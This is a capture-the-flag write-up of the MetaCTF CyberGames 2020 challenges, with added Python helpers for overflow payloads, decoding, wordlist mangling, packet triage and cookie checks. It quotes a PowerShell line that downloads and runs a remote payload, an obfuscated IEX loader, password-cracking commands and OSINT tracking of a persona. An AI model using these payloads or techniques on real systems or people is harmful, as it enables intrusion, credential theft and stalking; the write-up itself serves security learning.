MetaCTF logo in front of a computer screen
MetaCTF held its annual CyberGames competition on the weekend of October 24th.

MetaCTF CyberGames 2020 Writeup — Last Minute Team Name

Challenges and Kickoff

The MetaCTF Cyber Games 2020 Kickoff on October 24th

Our Strategy

Discord channels showing green checkboxes, a white question mark, or a red question mark
The forensics challenges that I worked on during the competition showing our challenge notation

Binary Exploitation

Baffling Buffer 0

#include <stdio.h>
#include <stdlib.h>

void vuln() {
    int isAuthenticated = 0;
    char buf[48];                 /* 48 bytes, but the read below has no bound */
    puts("Enter the access code: ");
    gets(buf);                    /* overflow: bytes past buf land on whatever the compiler put after it */
    puts("TODO: Implement access code checking.");
    if(isAuthenticated) {         /* any non-zero value wins; the code is never checked */
        system("/bin/cat flag.txt");
    }
    else {
        puts("Invalid auth!");
    }
}

int main() {
    setbuf(stdout, 0);
    setbuf(stdin, 0);
    setbuf(stderr, 0);
    vuln();
    return 0;
}
A terminal accessing the challenge and inputting too many characters
Inserting “aaaaaa…” into the buffer
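An added example, not from the original writeup: a small Python script that builds the overflow line and models why it works. It assumes the usual layout where isAuthenticated sits at a higher address than buf, and it guesses 16 bytes of overrun past the 48-byte buffer (the exact gap depends on the compiler; if the first guess fails, grow the overrun). The model also shows the one way a long input still fails: if the bytes that land on isAuthenticated are all zero, the check stays false, which is why the filler must be a non-zero byte.

```python
import sys

BUF_SIZE = 48          # char buf[48] in the challenge source
OVERRUN = 16           # assumption: extra bytes to be sure isAuthenticated is covered


def build_payload(buf_size=BUF_SIZE, overrun=OVERRUN, filler=b"a"):
    """Return the line fed to gets(): buf_size + overrun copies of a non-zero byte.

    gets() copies everything up to the newline, so the bytes past the end of
    buf land on whatever the compiler placed after it; any non-zero value
    there makes `if(isAuthenticated)` true.
    """
    if len(filler) != 1 or filler == b"\x00":
        raise ValueError("filler must be a single non-zero byte")
    return filler * (buf_size + overrun) + b"\n"


def simulate_vuln(line, buf_size=BUF_SIZE, flag_offset=BUF_SIZE):
    """Model the stack frame of vuln() and return what isAuthenticated holds
    after gets(buf) ran on `line`.

    The frame is modelled as buf followed directly by the 4-byte int
    (flag_offset is an assumption; real compilers may insert padding).
    """
    frame = bytearray(buf_size + 4 + 64)   # buf, the int, some slack
    data = line.split(b"\n", 1)[0]         # gets() stops at the newline ...
    frame[: len(data)] = data              # ... and never checks the length
    return int.from_bytes(frame[flag_offset:flag_offset + 4], "little")


if __name__ == "__main__":
    # pipe into the service: python3 bb0.py | nc <host> <port>
    sys.stdout.buffer.write(build_payload())
```

The simulation is only there to make the failure mode visible; against the real binary the only feedback is whether the flag comes back, so start with a generous overrun and shrink it if you want the exact offset.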

Cryptography

Crypto Stands For Cryptography

TWV0YUNURntiYXNlNjRfZW5jMGRpbmdfaXNfbjB0X3RoZV9zYW1lX2FzX2VuY3J5cHRpMG4hfQ==
CyberChef with a Base64 recipe

ROT 26

Screenshot showing the ciphertext input to the Dcode website
Using Dcode with the full ASCII table to see different shifts
Screenshot showing the flag
The shift that produced the flag: the printable ASCII range [!-~] (94 characters) with an offset of 26
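The dCode setting in the caption is a Caesar shift over the 94 printable characters from ! to ~ rather than over the 26 letters, which is why a plain ROT tool shows nothing. As an added example (not part of the original writeup), here is that shift in Python together with a brute force over all 94 offsets keyed on the MetaCTF{ prefix, so the direction of the shift does not matter. The sample flag in the usage is made up.

```python
LO, HI = ord("!"), ord("~")     # the printable ASCII range dCode calls [!-~]
N = HI - LO + 1                 # 94 symbols in the "alphabet"


def rot_printable(text, shift):
    """Shift every printable character by `shift` positions, wrapping inside
    !..~ ; spaces and anything outside the range pass through unchanged."""
    out = []
    for ch in text:
        c = ord(ch)
        if LO <= c <= HI:
            c = (c - LO + shift) % N + LO
        out.append(chr(c))
    return "".join(out)


def brute_force(cipher, marker="MetaCTF{"):
    """Try all 94 offsets and return (shift, plaintext) for the first one that
    yields the flag prefix, or None if no offset produces it."""
    for shift in range(N):
        cand = rot_printable(cipher, -shift)
        if marker in cand:
            return shift, cand
    return None


if __name__ == "__main__":
    sample = "MetaCTF{s4mpl3_fl4g}"           # constructed, not the challenge flag
    ct = rot_printable(sample, 26)
    print(ct)
    print(brute_force(ct))
```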

Welcome to the Obfuscation Games!

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAEFgjl8A/xXMMQrCQBCF4as8FltPIFaCnV3A8jFmn8ngupuYaUS8e5LyL77//vHQcWxLIHWj8Cw2wBd4RWyp2resjMm+pVlOJxzmGWekm8Iu3fU3ScXrwIf1L26C+4CtijukBY3hb/3TCj2Ieh9qAAAA"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
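The one-liner is the standard two-stage loader shape: Base64, then gzip, then Invoke-Expression on the result. The safe way to look at a stage like this is to run everything except the last step (replace IEX with Write-Output) or to decode it outside PowerShell altogether. The script below is an added example, not from the original writeup: it unpacks the blob from the one-liner above without executing anything and prints the next stage. The blob is copied as it appears on the page; if it was damaged in transcription the decode raises rather than silently passing. encode_stage is the inverse, handy for building test samples.

```python
import base64
import gzip
import re

# The blob from the obfuscated one-liner above (copied from the page).
STAGE1_B64 = (
    "H4sIAEFgjl8A/xXMMQrCQBCF4as8FltPIFaCnV3A8jFmn8ngupuYaUS8e5LyL77//vHQcWxLIHWj8Cw2wBd4"
    "RWyp2resjMm+pVlOJxzmGWekm8Iu3fU3ScXrwIf1L26C+4CtijukBY3hb/3TCj2Ieh9qAAAA"
)

# Accepts the curly quotes Medium substitutes for straight ones as well.
_FROM_B64 = re.compile(r'FromBase64String\(\s*["“]([A-Za-z0-9+/=]+)["”]\s*\)')


def extract_blob(one_liner):
    """Pull the Base64 argument out of a FromBase64String(...) call."""
    m = _FROM_B64.search(one_liner)
    if not m:
        raise ValueError("no FromBase64String(...) argument found")
    return m.group(1)


def decode_stage(b64):
    """Base64-decode and gunzip the blob exactly as the loader does, but
    return the text instead of handing it to Invoke-Expression."""
    raw = base64.b64decode(b64, validate=True)
    if raw[:2] != b"\x1f\x8b":
        raise ValueError("not a gzip stream: %r" % raw[:4])
    return gzip.decompress(raw).decode("utf-8", errors="replace")


def encode_stage(text):
    """Inverse of decode_stage: build a blob the loader would accept."""
    return base64.b64encode(gzip.compress(text.encode("utf-8"))).decode("ascii")


if __name__ == "__main__":
    print(decode_stage(STAGE1_B64))
```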

The Last Great ZIP File

sudo apt-get install fcrackzip
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt flag.zip
A screenshot of a terminal running fcrackzip
The fcrackzip command with a rockyou.txt dictionary and the flag.zip file
A screenshot of a terminal running the unzip command
Extracting the flag from the .zip file once the password is known
Bad handwriting of the flag
Somebody likes MS Paint.

Board Meeting Gone Wrong

python office2john.py Board_Meeting_Notes.docx
A terminal showing the wordlistgen.py command
The WordListGen.py command converting a text file into leet
!!@m@1972
!08$+3r1972
!0ng-3@r3d 0w!1972
!1++!3 P3ngu1n1972
!10n1972
!10nf1$h1972
!12@rd1972
!1g3r1972
!30p@rd1972
A screenshot of a terminal with the Hashcat command and statistics
Running Hashcat with the hash obtained from Office2John
A file containing some irrelevant text and the flag
The Board_Meeting_Notes.docx file
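The WordListGen step turns a plain list of words into the leet variants shown above with the year appended. As an added example (not the original WordListGen.py), here is the same transform in Python using the substitutions the sample output implies (l to !, a to @, o to 0, b to 8, s to $, t to +, e to 3, i to 1, z to 2; letters without a substitution keep their case, which is why the P in Penguin survives), plus the equivalent hashcat rule line so the mangling can happen at crack time with -r instead of through a pre-generated list. The input words are constructed; the 1972 suffix is the one visible in the sample output.

```python
# Substitutions that reproduce the sample output above (inferred from it).
LEET = {"l": "!", "a": "@", "o": "0", "b": "8", "s": "$",
        "t": "+", "e": "3", "i": "1", "z": "2"}


def leetify(word):
    """Apply LEET to every letter it covers, case-insensitively; everything
    else (P, n, g, spaces, hyphens) is left untouched."""
    return "".join(LEET.get(ch.lower(), ch) for ch in word)


def mangle(word, suffix):
    return leetify(word) + suffix


def build_wordlist(words, suffixes):
    """One candidate per (word, suffix), deduplicated, order preserved."""
    seen, out = set(), []
    for w in words:
        for s in suffixes:
            cand = mangle(w, s)
            if cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


def hashcat_rule(suffix):
    """The same mangling as one hashcat rule line: sXY replaces every X with Y
    (one entry per case so 'Little' and 'little' both become '!1++!3'),
    $c appends c. Use with: hashcat -r leet.rule -a 0 <hash> animals.txt"""
    parts = []
    for src, dst in LEET.items():
        parts.append(f"s{src}{dst}")
        parts.append(f"s{src.upper()}{dst}")
    parts.extend(f"${c}" for c in suffix)
    return " ".join(parts)


if __name__ == "__main__":
    animals = ["llama", "lobster", "long-eared owl", "Little Penguin"]  # constructed
    for cand in build_wordlist(animals, ["1972"]):
        print(cand)
    print(hashcat_rule("1972"))
```

The replacement order does not matter here because no substitution produces a character that is itself a key, so the hashcat rule and the Python function give identical candidates.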

Forensics

Forensics 101

Staging in 1…2…3

A Windows unidentified file icon
123.tmp viewed in Windows
A Linux RAR file icon
123.tmp viewed in Linux
A screenshot of the terminal with the Linux file command identifying a RAR file
‘file’ command output
Screenshot of a terminal with the unrar command and the flag
Using `unrar` to extract the file
MetaCTF{definitely_n0t_all_0f_y0ur_sensitive_data}
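file ignores the extension and reads the signature at the start of the file, which is exactly what renaming the archive to 123.tmp defeats in Explorer but not here. An added example, not from the original writeup: a small version of that check in Python covering the container formats that come up in this writeup (RAR 4 and 5, 7-zip, ZIP including the OOXML family, gzip, PDF) and two image types, plus a helper that flags files whose extension disagrees with their content. The inputs in the usage are constructed byte strings.

```python
# (signature, offset, description); more specific signatures first
MAGIC = [
    (b"Rar!\x1a\x07\x01\x00", 0, "RAR archive (v5)"),
    (b"Rar!\x1a\x07\x00",     0, "RAR archive (v4)"),
    (b"7z\xbc\xaf\x27\x1c",   0, "7-zip archive"),
    (b"%PDF-",                0, "PDF document"),
    (b"PK\x03\x04",           0, "ZIP archive (also docx/xlsx/pptx/jar)"),
    (b"\x1f\x8b",             0, "gzip compressed data"),
    (b"\x89PNG\r\n\x1a\n",    0, "PNG image"),
    (b"\xff\xd8\xff",         0, "JPEG image"),
]

# What each extension claims to be, keyed on a word from the description.
CLAIMS = {"rar": "RAR", "7z": "7-zip", "pdf": "PDF", "zip": "ZIP", "docx": "ZIP",
          "xlsx": "ZIP", "pptx": "ZIP", "gz": "gzip", "png": "PNG", "jpg": "JPEG", "jpeg": "JPEG"}


def identify(data):
    """Return a description for the leading bytes of `data`, or 'data' when no
    signature matches (what file(1) prints for unknown content)."""
    for sig, off, desc in MAGIC:
        if data[off:off + len(sig)] == sig:
            return desc
    return "data"


def identify_path(path):
    with open(path, "rb") as fh:
        return identify(fh.read(16))


def extension_lies(name, data):
    """True when the extension suggests something other than the content says,
    e.g. 123.tmp that is really a RAR archive."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    desc = identify(data)
    if ext not in CLAIMS:
        return desc != "data"            # unknown or odd extension on a known type
    return CLAIMS[ext] not in desc


if __name__ == "__main__":
    sample = b"Rar!\x1a\x07\x00" + b"\x00" * 16   # constructed RAR4 header
    print(identify(sample), extension_lies("123.tmp", sample))
```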

Publish3r

7z x Publish3r.7z
A screenshot of the terminal with the Linux file command identifying a Publisher document
‘file’ command output
strings Publish3r.7z > strings.txt
Screenshot of the CyberChef application showing a result snippet with properties Base64 — Valid UTF8 output and entropy 4.09
CyberChef Magic results for the encoded string
Screenshot of the CyberChef application with a URL output
CyberChef Base64 Decode results for the encoded string
IEx ((nEW-OBJeCt net.webclient).downloadstring(("http://13.37.10.10:4443/doc/payload.ps1")))
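CyberChef's Magic operation picked the blob out of the strings dump because it decodes to valid text. The same triage can be scripted: pull out long runs of Base64 alphabet characters and keep only the ones that decode to mostly printable text, which throws away padding runs and binary noise. This is an added example in Python, not the original workflow, run over a constructed stand-in for the strings output that embeds the downloader from the page; it walks plain text and does not parse the Publisher file structure itself.

```python
import base64
import re
import string

B64_RUN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
PRINTABLE = set(string.printable)


def find_base64_runs(text, min_len=20):
    """Yield substrings that look like Base64: long runs of the alphabet whose
    length (padding included) is a multiple of 4."""
    for m in B64_RUN.finditer(text):
        run = m.group(0)
        if len(run) >= min_len and len(run) % 4 == 0:
            yield run


def decode_if_text(run, min_printable=0.95):
    """Decode a run and return the text only if it is mostly printable
    (roughly CyberChef's 'Valid UTF8 output' heuristic); otherwise None."""
    try:
        text = base64.b64decode(run, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    if not text:
        return None
    if sum(ch in PRINTABLE for ch in text) / len(text) < min_printable:
        return None
    return text


def hunt(strings_dump):
    """(encoded, decoded) pairs for every run that decodes to text."""
    hits = []
    for run in find_base64_runs(strings_dump):
        decoded = decode_if_text(run)
        if decoded is not None:
            hits.append((run, decoded))
    return hits


# Constructed stand-in for `strings` output: Publisher-ish noise plus the
# downloader from the page, Base64-encoded the way it was found.
DOWNLOADER = 'IEx ((nEW-OBJeCt net.webclient).downloadstring(("http://13.37.10.10:4443/doc/payload.ps1")))'
SAMPLE_DUMP = "\n".join([
    "Root Entry", "Microsoft Publisher 15.0", "Quill",
    base64.b64encode(DOWNLOADER.encode()).decode(),
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",      # long run, decodes to NUL bytes only
    "Contents", "Escher",
])


if __name__ == "__main__":
    for enc, dec in hunt(SAMPLE_DUMP):
        print(enc[:32] + "...", "->", dec)
```

The printable-ratio threshold is the knob: lower it to catch payloads with embedded binary, raise it to cut false positives on long hex or GUID-like runs.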

Open Thermal Exhaust Port

A screenshot of Wireshark with multiple repeating rows of outgoing SYN traffic and returning RST, ACK traffic
The packet capture showing port scans from 10.0.2.15 to 10.0.2.6
A screenshot of Wireshark showing only a few rows of returning SYN, ACK traffic
The packet capture with filters applied
80 (HTTP) + 443 (HTTPS) + 23 (Telnet) + 21 (FTP) + 53 (DNS) + 22 (SSH) + 3128 (Squid Proxy) = 3770
MetaCTF{3770}
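The screenshots show the usual Wireshark workflow: a closed port answers the scanner's SYN with RST/ACK, an open one answers with SYN/ACK, so the filter tcp.flags.syn == 1 && tcp.flags.ack == 1 && ip.src == 10.0.2.6 leaves only the open ports, which are then added up. As an added example (not the original steps), here is that classification in Python over a constructed packet list in tshark field format rather than the real pcap; the real capture would be exported first with tshark -r capture.pcap -T fields -e ip.src -e ip.dst -e tcp.srcport -e tcp.dstport -e tcp.flags. Scoping to the scanner and target addresses matters: SYN/ACKs from any other host in the capture would inflate the sum.

```python
SYN, RST, ACK = 0x02, 0x04, 0x10


def parse_tshark_fields(lines):
    """Parse tab-separated tshark field output (flags as hex) into dicts."""
    pkts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        src, dst, sport, dport, flags = line.split("\t")
        pkts.append({"src": src, "dst": dst, "sport": int(sport),
                     "dport": int(dport), "flags": int(flags, 16)})
    return pkts


def classify_ports(pkts, scanner, target):
    """Open = target answered SYN/ACK; closed = target answered RST;
    filtered = probed but never answered."""
    probed, open_ports, closed = set(), set(), set()
    for p in pkts:
        f = p["flags"]
        if p["src"] == scanner and p["dst"] == target and f & SYN and not f & ACK:
            probed.add(p["dport"])
        elif p["src"] == target and p["dst"] == scanner:
            if f & SYN and f & ACK:
                open_ports.add(p["sport"])
            elif f & RST:
                closed.add(p["sport"])
    return {"open": sorted(open_ports), "closed": sorted(closed),
            "filtered": sorted(probed - open_ports - closed)}


def port_sum_flag(pkts, scanner, target):
    total = sum(classify_ports(pkts, scanner, target)["open"])
    return total, "MetaCTF{%d}" % total


# Constructed excerpt in tshark field format (scanner 10.0.2.15 -> target 10.0.2.6).
SAMPLE = """
10.0.2.15\t10.0.2.6\t40001\t21\t0x0002
10.0.2.6\t10.0.2.15\t21\t40001\t0x0012
10.0.2.15\t10.0.2.6\t40002\t22\t0x0002
10.0.2.6\t10.0.2.15\t22\t40002\t0x0012
10.0.2.15\t10.0.2.6\t40003\t23\t0x0002
10.0.2.6\t10.0.2.15\t23\t40003\t0x0012
10.0.2.15\t10.0.2.6\t40004\t25\t0x0002
10.0.2.6\t10.0.2.15\t25\t40004\t0x0014
10.0.2.15\t10.0.2.6\t40005\t53\t0x0002
10.0.2.6\t10.0.2.15\t53\t40005\t0x0012
10.0.2.15\t10.0.2.6\t40006\t80\t0x0002
10.0.2.6\t10.0.2.15\t80\t40006\t0x0012
10.0.2.15\t10.0.2.6\t40007\t443\t0x0002
10.0.2.6\t10.0.2.15\t443\t40007\t0x0012
10.0.2.15\t10.0.2.6\t40008\t3128\t0x0002
10.0.2.6\t10.0.2.15\t3128\t40008\t0x0012
10.0.2.15\t10.0.2.6\t40009\t8080\t0x0002
""".strip().splitlines()


if __name__ == "__main__":
    pkts = parse_tshark_fields(SAMPLE)
    print(classify_ports(pkts, "10.0.2.15", "10.0.2.6"))
    print(port_sum_flag(pkts, "10.0.2.15", "10.0.2.6"))
```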

Mystery C2

A screenshot of the PacketTotal service with the .pcap file analysis displayed
PacketTotal identifying the target IP 8.8.4.4 and the target port 443

Just in Time

A screenshot of FTK Imager with the Users folder open
AppData folder displayed in the evidence tree in FTK Imager
A screenshot of Excel with the Hindsight .csv file open
Hindsight’s .csv file export displaying visited URLs, site preferences, and downloads
A screenshot of FTK Imager displaying the evidence tree expanded to the Wire folder
The Wire IndexedDB folder
A screenshot of FTK Imager displaying the file list with last modified dates
The log files in the Wire IndexedDB folder
FTK Imager viewing a log file with the word “meet” highlighted and an address visible in the same line
Searching for the word “meet” in the log file

Multimedia

Watermarked

A screenshot of Audacity with the two audio tracks visualized
Inverting the audio of the two tracks in Audacity
MetaCTF{p4r7ing_7h3_w4v3z}

Reconnaissance

Big Breaches

Not So Itsy Bitsy Spider

A search result “Ryuk in 5 Hours — The DFIR Report”
The first result when searching for “Ryuk CVE 2020”
A screenshot of CVE-2020–1472 from the NIST NVD
The National Vulnerability Database (NVD) listing for CVE-2020–1472

Diving into the announcement

Finding Mr. Casyn

Google search results for “mr. casyn”
Lots of “Casyn”s available online, I guess…
A screenshot of the Wikipedia page for the Chicago metropolitan area
Wikipedia’s list of cities considered part of “Chicagoland”
Google search results for “casyn hammond”
A relevant link
A screenshot of Vedder Casyn’s Twitter profile
Found you, Vedder Casyn!

Complete Transparency

Screenshot of a 403 Forbidden error
A 403 error from Cloudflare
A screenshot of the Censys website showing the subdomains of icmpindustries.com
Censys, a tool that indexes certificates issued to websites, among other things

Ring Ring

A screenshot of a GitHub commit containing a phone number
He removed his phone number from his website but forgot to rewrite his commit history!

Hangout Spots

A screenshot of a restaurant on Vedder Casyn’s website
Unfortunately, it doesn’t look like this is his hangout spot.
A screenshot of a GitHub commit containing an image link
He forgot to rewrite his commit history again.
A photo of a building with sun glare
There is an antenna tower with two satellite dishes on it in the background. Is this enough to find the location?
A screenshot of the FCC antenna search application
Antenna structures tall enough to need FAA notification must be registered with the FCC in this database.
A screenshot of the FCC’s antenna structure database with results
The sixth result is interesting…
An antenna structure with two domed satellite dishes affixed halfway up
The dishes’ positions appear to match.
Two nearby buildings have matching roofs.
That’s a match!

Reverse Engineering

[REDACTED]

A memo with a black redaction bar placed on top of the flag
The redacted PDF document
A screenshot of the terminal with peepdf results
There is a large jump between the fifth and sixth object offsets, so object 5 holds a large stream: the image.
PPDF> rawstream 5 > docoutput.jpg
The memo without a black redaction bar placed on top of the flag
The flag is clearly visible.
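The redaction was a black rectangle drawn on top of the page; the original image is still in the file as its own stream object, which is why rawstream 5 in peepdf hands it back intact. The same extraction without peepdf, as an added example that is not part of the original steps: scan the file for stream/endstream pairs and write out every stream whose raw bytes begin with an image signature. This is pattern matching, not a PDF parser: it handles the common stream\n and stream\r\n forms and raw (DCTDecode) JPEG data, but images wrapped in FlateDecode start with a zlib header and would need decompressing first, and objects packed inside compressed object streams are not seen at all. The sample PDF bytes in the block are constructed.

```python
import re

STREAM_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)stream\r?\n(.*?)\r?\nendstream", re.S)
IMAGE_MAGIC = {b"\xff\xd8\xff": "jpg", b"\x89PNG\r\n\x1a\n": "png"}


def iter_streams(pdf_bytes):
    """Yield (object number, dictionary bytes, raw stream bytes) for each
    stream object found by pattern matching (no xref parsing)."""
    for m in STREAM_RE.finditer(pdf_bytes):
        yield int(m.group(1)), m.group(3), m.group(4)


def find_images(pdf_bytes):
    """Streams whose raw bytes start with an image signature, as
    (object number, extension, data)."""
    found = []
    for num, _dict, data in iter_streams(pdf_bytes):
        for magic, ext in IMAGE_MAGIC.items():
            if data.startswith(magic):
                found.append((num, ext, data))
    return found


def dump_images(pdf_path, prefix="obj"):
    """Write every raw image stream to prefix<objnum>.<ext>; returns the names."""
    with open(pdf_path, "rb") as fh:
        pdf = fh.read()
    names = []
    for num, ext, data in find_images(pdf):
        name = f"{prefix}{num}.{ext}"
        with open(name, "wb") as out:
            out.write(data)
        names.append(name)
    return names


# Constructed minimal PDF fragment: a page content stream and a JPEG image stream.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"4 0 obj\n<< /Length 12 >>\nstream\n0 0 0 rg q Q\nendstream\nendobj\n"
    b"5 0 obj\n<< /Type /XObject /Subtype /Image /Length 10 >>\nstream\n"
    b"\xff\xd8\xff\xe0JFIF\x00\x01\n"       # JPEG signature, made-up payload
    b"endstream\nendobj\n"
)


if __name__ == "__main__":
    for num, ext, data in find_images(SAMPLE_PDF):
        print(f"object {num}: {ext}, {len(data)} bytes")
```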

Precision Matching

A screenshot of the Yara Rule Checking application with a blank rule pre-filled
The Yara Rule Checker, how nice!
rule yarp {
    condition:
        false
}
A screenshot of the Yara Rule Checking application with no matches
Yara matching results for the empty rule
rule yarp {
    strings:
        $crt = "CreateRemoteThread"
    condition:
        $crt
}
A screenshot of the Yara Rule Checking application matching all files
Yara rule matching for the string rule
rule yarp {
    strings:
        $crt = "CreateRemoteThread"
    condition:
        $crt in (0x1..0x0002CC50)
}
A screenshot of the Yara Rule Checking application matching with two false positives
Yara rule matching for the dynamic calls rule
import "pe"

rule yarp {
    strings:
        $crt = "CreateRemoteThread"
    condition:
        $crt in (0x1..0x0002CC50) and
        pe.linker_version.minor > 20
}
A screenshot of the Yara Rule Checking application matching correctly
Yara rule matching for the linker version rule

Web Exploitation

High Security Fan Page

function authenticate(){
    var username = document.getElementById("inputUsername").value;
    var password = document.getElementById("inputPassword").value;
    var notFailed = true;
    // Client-side "authentication": the expected values ship to every visitor in the page source.
    if(username!="ChrisM"){
        alert("You did not enter the correct username!");
        notFailed = false;
    }
    if(password!="MetaCTF{So_You_Wanna_Play_With_Magic}"){
        alert("You did not enter the correct password!");
        notFailed = false;
    }
    if(notFailed){
        alert("Hiya!");
        window.location.pathname = './a3263ca2855a26f06bd679ac3e240af9/adminpanel.html';
    }
}

Barry’s Web Application

A screenshot of the “Barry’s web server” website
Barry’s website
A screenshot of the OWASP ZAP main page
ZAP is OWASP’s automated web vulnerability scanner.
A screenshot of ZAP’s results for Barry’s website
“Directory browsing is enabled.”
A screenshot of a webpage showing the flag
The hidden file in the ‘/docs’ directory

Everyone Loves a Good Cookie

A screenshot of the website prompting for a secret code
We don’t have a secret code, oh no…
A screenshot of Chrome’s cookie manager
The cm-authenticated cookie set by the website
A screenshot of BurpSuite’s proxy tool
BurpSuite is a popular web application manipulation tool and proxy.
A screenshot of BurpSuite’s repeater tool
The ‘cm-authenticated’ cookie is set to 1. Do we still need a password?
A screenshot of BurpSuite’s repeater tool
The flag is visible in the response.
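The bug is that the server trusts a client-writable flag: whatever the browser sends in cm-authenticated is taken at face value, so flipping it to 1 in Repeater is the whole exploit. As an added example (not the challenge's server code), here is that check beside a fixed version in Python: the cookie value carries the user, an issue time and an HMAC under a server-side secret, so a forged or tampered cookie fails verification and an old one expires. The cookie name is the one from the page; SECRET, the user name and the timestamps are assumptions, and http.cookies from the standard library does the Cookie header parsing.

```python
import hashlib
import hmac
import secrets
from http.cookies import SimpleCookie

COOKIE_NAME = "cm-authenticated"


# --- Vulnerable: the flag lives entirely in the client's hands ---------------
def is_authenticated_vulnerable(cookie_header):
    jar = SimpleCookie()
    jar.load(cookie_header)
    return COOKIE_NAME in jar and jar[COOKIE_NAME].value == "1"


# --- Fixed: the value is a MAC over who was authenticated and when -----------
SECRET = secrets.token_bytes(32)   # assumption: generated once, kept server-side only


def _mac(payload, secret):
    return hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()


def issue_token(user, issued_at, secret=SECRET):
    """Value to set after the secret code was verified: user.issued_at.mac"""
    payload = f"{user}.{issued_at}"
    return f"{payload}.{_mac(payload, secret)}"


def set_cookie_header(token):
    return f"{COOKIE_NAME}={token}; HttpOnly; Secure; SameSite=Lax"


def is_authenticated_fixed(cookie_header, now, max_age=3600, secret=SECRET):
    """Return the authenticated user, or None if the cookie is missing,
    malformed, forged, tampered with, or older than max_age seconds."""
    jar = SimpleCookie()
    jar.load(cookie_header)
    if COOKIE_NAME not in jar:
        return None
    try:
        user, issued_at, mac = jar[COOKIE_NAME].value.rsplit(".", 2)
        issued_at = int(issued_at)
    except ValueError:
        return None
    payload = f"{user}.{issued_at}"
    if not hmac.compare_digest(mac, _mac(payload, secret)):   # constant-time compare
        return None
    if now - issued_at > max_age:
        return None
    return user


if __name__ == "__main__":
    print(is_authenticated_vulnerable("cm-authenticated=1"))             # True: game over
    print(is_authenticated_fixed("cm-authenticated=1", now=1500))        # None
    tok = issue_token("alice", 1000)
    print(set_cookie_header(tok))
    print(is_authenticated_fixed(f"cm-authenticated={tok}", now=1500))   # alice
```

A server-side session store (random ID in the cookie, state on the server) is the other standard fix; the MAC version shown here keeps the server stateless but means the secret must never reach the client.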

Bonus Flags

CyberGames 2020 Design Bonus

The logo with various encodings in the image
The CyberGames 2020 logo

In Conclusion

DFIR, CTFs, disinformation, STEM education, and pretty much anything else that comes to mind. RIT Computing Security ’22. wyatttauber.com
